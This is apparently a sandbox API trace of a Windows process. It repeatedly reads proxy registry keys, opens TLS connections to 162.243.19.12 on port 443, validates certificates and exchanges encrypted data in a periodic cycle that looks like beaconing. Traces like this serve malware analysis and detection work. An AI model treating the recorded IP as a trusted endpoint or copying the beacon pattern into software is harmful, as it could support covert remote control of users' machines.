	[0576.216] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x164) returned 0x0
	[0576.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0576.216] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0576.216] GetCurrentProcess () returned 0xffffffffffffffff
	[0576.216] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0xe4) returned 1
	[0576.217] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb18580
	[0576.217] WinHttpSetTimeouts (hInternet=0x2ad3bb18580, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0576.217] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0576.231] SetEvent (hEvent=0x6b8) returned 1
	[0576.232] select (in: nfds=0, readfds=0x2ad23bbf620, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bbf620, writefds=0x0, exceptfds=0x0) returned 1
	[0576.232] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0576.233] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0576.233] shutdown (s=0x7d0, how=2) returned 0
	[0576.234] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0576.234] closesocket (s=0x7d0) returned 0
	[0576.235] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0576.235] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x270
	[0576.235] WSAConnect (in: s=0x7d0, name=0x2ad23bc0db8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0576.341] closesocket (s=0x270) returned 0
	[0576.341] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bbdd60, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bc1640, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bc1640, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0576.342] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfac0 | out: pvContextBuffer=0x2ad3badfac0) returned 0x0
	[0576.342] send (in: s=0x7d0, buf=0x2ad23bc1710*, len=333, flags=0 | out: buf=0x2ad23bc1710*) returned 333
	[0576.343] recv (in: s=0x7d0, buf=0x2ad23bc1710, len=5, flags=0 | out: buf=0x2ad23bc1710*) returned 5
	[0576.448] recv (in: s=0x7d0, buf=0x2ad23bc1715, len=49, flags=0 | out: buf=0x2ad23bc1715*) returned 49
	[0576.448] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bbdd60, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bc1950, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bc1970, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bc1970, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0576.449] recv (in: s=0x7d0, buf=0x2ad23bc1a60, len=5, flags=0 | out: buf=0x2ad23bc1a60*) returned 5
	[0576.449] recv (in: s=0x7d0, buf=0x2ad23bc1a85, len=1, flags=0 | out: buf=0x2ad23bc1a85*) returned 1
	[0576.449] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bbdd60, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bc1b58, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bc1b78, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bc1b78, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0576.449] recv (in: s=0x7d0, buf=0x2ad23bc1c68, len=5, flags=0 | out: buf=0x2ad23bc1c68*) returned 5
	[0576.449] recv (in: s=0x7d0, buf=0x2ad23bc1c8d, len=48, flags=0 | out: buf=0x2ad23bc1c8d*) returned 48
	[0576.449] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bbdd60, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bc1d90, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bc1db0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bc1db0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0576.450] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3740 | out: pvContextBuffer=0x2ad3bad3740) returned 0x0
	[0576.450] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bc1ef8 | out: pBuffer=0x2ad23bc1ef8) returned 0x0
	[0576.450] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bc1f50 | out: pBuffer=0x2ad23bc1f50) returned 0x0
	[0576.450] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bc1fb8 | out: pBuffer=0x2ad23bc1fb8) returned 0x0
	[0576.450] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06250) returned 0x2ad3bb06250
	[0576.450] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0576.450] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb06250
	[0576.450] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06250) returned 0x2ad3bb06250
	[0576.450] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb06250) returned 0x0
	[0576.450] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0576.451] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0576.451] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0576.451] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb06250, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0576.451] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06250, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0576.452] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0576.453] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06250) returned 0x2ad3bb06250
	[0576.454] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0576.456] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0576.456] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0576.456] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0576.456] SetLastError (dwErrCode=0x0) 
	[0576.456] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0576.456] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0576.456] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0576.457] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bc4bc0, MessageSeqNo=0x0 | out: pMessage=0x2ad23bc4bc0) returned 0x0
	[0576.457] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca490
	[0576.457] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca490*=((len=0x3b, buf=0x2ad23bc1e80*), (len=0xd5, buf=0x2ad23bc49c8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca490*=((len=0x3b, buf=0x2ad23bc1e80*), (len=0xd5, buf=0x2ad23bc49c8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0576.457] CoTaskMemFree (pv=0x2ad3baca490) 
	[0576.457] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0576.457] recv (in: s=0x7d0, buf=0x2ad23bc4d68, len=5, flags=0 | out: buf=0x2ad23bc4d68*) returned 5
	[0576.946] recv (in: s=0x7d0, buf=0x2ad23bc4d8d, len=1488, flags=0 | out: buf=0x2ad23bc4d8d*) returned 1488
	[0576.946] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bc5470, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bc5470, pfQOP=0x0) returned 0x0
	[0576.946] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0576.946] SetEvent (hEvent=0x6b8) returned 1
	[0576.983] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0589.991] CloseHandle (hObject=0x3f4) returned 1
	[0590.430] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0590.430] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d8) returned 0x0
	[0590.431] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0590.431] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0590.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0590.432] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0590.432] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0
	[0590.434] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x164) returned 0x0
	[0590.434] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0590.434] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0590.434] GetCurrentProcess () returned 0xffffffffffffffff
	[0590.434] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0xe4) returned 1
	[0590.435] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19680
	[0590.435] WinHttpSetTimeouts (hInternet=0x2ad3bb19680, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0590.436] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0590.469] SetEvent (hEvent=0x6b8) returned 1
	[0590.470] select (in: nfds=0, readfds=0x2ad23bcce68, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bcce68, writefds=0x0, exceptfds=0x0) returned 1
	[0590.471] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0590.473] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0590.475] shutdown (s=0x7d0, how=2) returned 0
	[0590.490] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0590.490] closesocket (s=0x7d0) returned 0
	[0590.492] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0590.493] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x270
	[0590.493] WSAConnect (in: s=0x7d0, name=0x2ad23bce600*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0590.608] closesocket (s=0x270) returned 0
	[0590.610] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bcb5a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bcee88, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bcee88, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0590.613] FreeContextBuffer (in: pvContextBuffer=0x2ad3badff10 | out: pvContextBuffer=0x2ad3badff10) returned 0x0
	[0590.613] send (in: s=0x7d0, buf=0x2ad23bcef58*, len=333, flags=0 | out: buf=0x2ad23bcef58*) returned 333
	[0590.614] recv (in: s=0x7d0, buf=0x2ad23bcef58, len=5, flags=0 | out: buf=0x2ad23bcef58*) returned 5
	[0590.719] recv (in: s=0x7d0, buf=0x2ad23bcef5d, len=49, flags=0 | out: buf=0x2ad23bcef5d*) returned 49
	[0590.720] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bcb5a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bcf198, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bcf1b8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bcf1b8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0590.720] recv (in: s=0x7d0, buf=0x2ad23bcf2a8, len=5, flags=0 | out: buf=0x2ad23bcf2a8*) returned 5
	[0590.720] recv (in: s=0x7d0, buf=0x2ad23bcf2cd, len=1, flags=0 | out: buf=0x2ad23bcf2cd*) returned 1
	[0590.720] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bcb5a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bcf3a0, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bcf3c0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bcf3c0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0590.721] recv (in: s=0x7d0, buf=0x2ad23bcf4b0, len=5, flags=0 | out: buf=0x2ad23bcf4b0*) returned 5
	[0590.721] recv (in: s=0x7d0, buf=0x2ad23bcf4d5, len=48, flags=0 | out: buf=0x2ad23bcf4d5*) returned 48
	[0590.721] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bcb5a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bcf5d8, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bcf5f8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bcf5f8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0590.723] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3320 | out: pvContextBuffer=0x2ad3bad3320) returned 0x0
	[0590.723] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bcf740 | out: pBuffer=0x2ad23bcf740) returned 0x0
	[0590.723] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bcf798 | out: pBuffer=0x2ad23bcf798) returned 0x0
	[0590.724] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bcf800 | out: pBuffer=0x2ad23bcf800) returned 0x0
	[0590.725] CertDuplicateCertificateContext (pCertContext=0x2ad3bb057d0) returned 0x2ad3bb057d0
	[0590.726] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0590.726] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb057d0
	[0590.726] CertDuplicateCertificateContext (pCertContext=0x2ad3bb057d0) returned 0x2ad3bb057d0
	[0590.726] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb057d0) returned 0x0
	[0590.727] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0590.727] CertFreeCertificateContext (pCertContext=0x2ad3bb057d0) returned 1
	[0590.729] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0590.729] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb057d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0590.730] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb057d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0590.732] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0590.733] CertDuplicateCertificateContext (pCertContext=0x2ad3bb057d0) returned 0x2ad3bb057d0
	[0590.734] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0590.735] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0590.735] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0590.735] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0590.735] SetLastError (dwErrCode=0x0) 
	[0590.735] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0590.737] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0590.737] CertFreeCertificateContext (pCertContext=0x2ad3bb057d0) returned 1
	[0590.737] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bd2408, MessageSeqNo=0x0 | out: pMessage=0x2ad23bd2408) returned 0x0
	[0590.737] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca130
	[0590.737] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23bcf6c8*), (len=0xd5, buf=0x2ad23bd2210*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23bcf6c8*), (len=0xd5, buf=0x2ad23bd2210*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0590.746] CoTaskMemFree (pv=0x2ad3baca130) 
	[0590.746] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0590.747] recv (in: s=0x7d0, buf=0x2ad23bd25b0, len=5, flags=0 | out: buf=0x2ad23bd25b0*) returned 5
	[0591.272] recv (in: s=0x7d0, buf=0x2ad23bd25d5, len=1488, flags=0 | out: buf=0x2ad23bd25d5*) returned 1488
	[0591.272] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bd2cb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bd2cb8, pfQOP=0x0) returned 0x0
	[0591.273] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0591.273] SetEvent (hEvent=0x6b8) returned 1
	[0591.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0612.326] CloseHandle (hObject=0x3f4) returned 1
	[0612.447] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0612.447] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d8) returned 0x0
	[0612.448] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0612.448] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0612.448] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0612.448] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0612.448] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0
	[0612.448] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x164) returned 0x0
	[0612.448] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0612.448] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0612.449] GetCurrentProcess () returned 0xffffffffffffffff
	[0612.449] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0xe4) returned 1
	[0612.449] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb198a0
	[0612.450] WinHttpSetTimeouts (hInternet=0x2ad3bb198a0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0612.450] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0612.467] SetEvent (hEvent=0x6b8) returned 1
	[0612.467] select (in: nfds=0, readfds=0x2ad23bda6b0, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bda6b0, writefds=0x0, exceptfds=0x0) returned 1
	[0612.468] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0612.468] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0612.469] shutdown (s=0x7d0, how=2) returned 0
	[0612.470] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0612.470] closesocket (s=0x7d0) returned 0
	[0612.471] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0612.471] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x270
	[0612.471] WSAConnect (in: s=0x7d0, name=0x2ad23bdbe48*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0612.578] closesocket (s=0x270) returned 0
	[0612.581] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bd8df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bdc6d0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bdc6d0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0612.582] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfc30 | out: pvContextBuffer=0x2ad3badfc30) returned 0x0
	[0612.582] send (in: s=0x7d0, buf=0x2ad23bdc7a0*, len=333, flags=0 | out: buf=0x2ad23bdc7a0*) returned 333
	[0612.582] recv (in: s=0x7d0, buf=0x2ad23bdc7a0, len=5, flags=0 | out: buf=0x2ad23bdc7a0*) returned 5
	[0612.688] recv (in: s=0x7d0, buf=0x2ad23bdc7a5, len=49, flags=0 | out: buf=0x2ad23bdc7a5*) returned 49
	[0612.688] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bd8df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bdc9e0, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bdca00, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bdca00, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0612.688] recv (in: s=0x7d0, buf=0x2ad23bdcaf0, len=5, flags=0 | out: buf=0x2ad23bdcaf0*) returned 5
	[0612.688] recv (in: s=0x7d0, buf=0x2ad23bdcb15, len=1, flags=0 | out: buf=0x2ad23bdcb15*) returned 1
